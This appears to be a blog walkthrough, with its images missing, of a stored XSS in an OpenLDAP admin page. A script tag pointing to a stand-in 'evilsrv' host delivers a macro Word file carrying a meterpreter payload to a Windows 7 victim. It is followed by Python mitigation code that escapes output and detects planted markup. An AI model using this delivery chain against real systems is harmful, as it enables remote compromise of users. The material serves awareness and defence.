Here we go...
When you're ready:
We can log in as admin and go directly to the place vulnerable to the injection attack:
After reading this link you will be ready to create the PoC file and prepare meterpreter:
OK, the payload file is prepared. I moved the checkme2.docm file to /var/www/html (but you can use python -m SimpleHTTPServer as well). So we are here:
To deliver our MS Word file to the victim user I will use a very well known 'payload' to inject our JS code into OpenLDAP: a SCRIPT tag with SRC. But first, the bug. We can 'check' if our 'scenario' is possible, for example here:
In the 'normal' case ;) we should see an alert() message box. This time we will use checkme2.docm. Let's go to the new aliases / associated domains:
The code for the persistent XSS (script src pointing to evilsrv/checkme.js) should be added here.
Now I switched the window to VM with my Windows7.
When you add our XSS example code you will see the traffic to the 'evil server' (left):
As you can see, we can save or open the file, so the payload ('redirect') works. If you want to go to the next stage of this example you should use a 'vulnerable' browser ;D
Why? Because in 'default mode' (in my case: Windows 7 Pro) IE will not download this file automatically. We need to change the security settings for the browser (to make it more 'vulnerable' ;)):
Good enough for the educational purposes. ;]
I decided to save the file and then open it (from Explorer, c:\downloads\ and so on):
Cool :) So we are here:
It's nothing sophisticated, but as you can see it can be used to raise awareness about XSS attacks and how to mitigate them.
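As an added illustration of the mitigation side (example code, not part of the original post or of any OpenLDAP admin tool): the stored alias / associated-domain value is rendered once unescaped, the way the vulnerable page must be doing it, and once HTML-escaped, with an input check and a scan of stored values for planted markup. The sample values and the evilsrv/checkme.js payload string are constructed from the post; the hostname is a placeholder.

```python
import html
import re

# Constructed sample: attribute values as they might be stored for an
# alias / associated-domain entry. The last one is the kind of stored-XSS
# payload the post describes (hostname and script name are placeholders).
SAMPLE_VALUES = [
    "alias.example.test",
    "mail.example.test",
    '<script src="http://evilsrv/checkme.js"></script>',
]

# Vulnerable rendering: the stored value is concatenated straight into the
# HTML, so a SCRIPT tag in an LDAP attribute becomes live script in the page.
def render_row_vulnerable(value: str) -> str:
    return f"<td>{value}</td>"

# Hardened rendering: the value is HTML-escaped at output time, so the browser
# displays the payload as text instead of fetching and executing checkme.js.
def render_row_safe(value: str) -> str:
    return f"<td>{html.escape(value, quote=True)}</td>"

# Input-side check: an alias / associated domain should be a hostname, so
# reject anything else instead of relying on the admin UI alone.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def is_valid_hostname(value: str) -> bool:
    return bool(HOSTNAME_RE.match(value))

# Detection: flag stored values carrying markup or script handlers, so existing
# directory entries can be audited for an already-planted payload.
MARKUP_RE = re.compile(r"<\s*/?\s*[A-Za-z]|javascript:|on\w+\s*=", re.IGNORECASE)

def find_suspicious(values):
    return [v for v in values if MARKUP_RE.search(v)]

if __name__ == "__main__":
    for v in SAMPLE_VALUES:
        print("valid hostname:", is_valid_hostname(v), "|", render_row_safe(v))
    print("suspicious:", find_suspicious(SAMPLE_VALUES))
```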
Maybe you will find it useful.